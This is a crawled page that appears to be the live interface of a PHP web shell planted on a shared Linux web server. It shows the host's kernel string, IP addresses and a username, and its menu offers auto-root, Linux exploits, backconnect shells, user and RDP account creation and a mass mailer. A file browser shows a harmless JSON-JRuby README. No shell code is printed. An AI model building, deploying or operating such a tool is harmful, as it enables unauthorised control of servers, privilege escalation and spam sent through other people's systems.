Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
ruby-json /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
README-json-jruby.md
929
B
-rw-r--r--
README.md.gz
4.51
KB
-rw-r--r--
changelog.Debian.gz
1.82
KB
-rw-r--r--
copyright
3.95
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README-json-jruby.md
JSON-JRuby ========== JSON-JRuby is a port of Florian Frank's native [`json` library](http://json.rubyforge.org/) to JRuby. It aims to be a perfect drop-in replacement for `json_pure`. Development version =================== The latest version is available from the [Git repository](http://github.com/mernen/json-jruby/tree): git clone git://github.com/mernen/json-jruby.git Compiling ========= You'll need JRuby version 1.2 or greater to build JSON-JRuby. Its path must be set on the `jruby.dir` property of `nbproject/project.properties` (defaults to `../jruby`). Additionally, you'll need [Ant](http://ant.apache.org/), and [Ragel](http://www.cs.queensu.ca/~thurston/ragel/) 6.4 or greater. Then, from the folder where the sources are located, type: ant clean jar to clean any leftovers from previous builds and generate the `.jar` files. To generate a RubyGem, specify the `gem` action rather than `jar`.
Close